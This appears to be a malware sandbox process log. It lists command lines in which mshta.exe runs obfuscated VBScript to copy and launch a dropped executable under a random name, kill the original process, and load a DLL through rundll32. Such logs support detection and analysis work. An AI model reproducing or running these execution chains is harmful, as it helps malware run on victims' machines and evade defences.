mshta.exe "C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\40.exe"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if """"== """" for %j In (""C:\Users\test22\AppData\Local\Temp\40.exe"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
1316cmd.exe "C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\40.exe" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if ""=="" for %j In ("C:\Users\test22\AppData\Local\Temp\40.exe" ) do taskkill /F -Im "%~Nxj"
2408mshta.exe "C:\Windows\System32\mshta.exe" VbscripT: clOSE( cReATEoBjEct ( "WSCriPt.ShELL"). run ( "CmD.EXE /c CopY /y ""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA& if ""/PCOd0LPl_yA""== """" for %j In (""C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE"" ) do taskkill /F -Im ""%~Nxj"" ", 0 ,TRUE ))
2976cmd.exe "C:\Windows\System32\cmd.exe" /c CopY /y "C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" W7sP3hTJPToEEt.exE &&START W7sP3HTJPToeET.exe /PCOd0LPl_yA&if "/PCOd0LPl_yA"=="" for %j In ("C:\Users\test22\AppData\Local\Temp\W7sP3hTJPToEEt.exE" ) do taskkill /F -Im "%~Nxj"
2220rundll32.exe "C:\Windows\System32\rundll32.exe" GBmH.yE,MSoGFUg
2776taskkill.exe taskkill /F -Im "40.exe"
916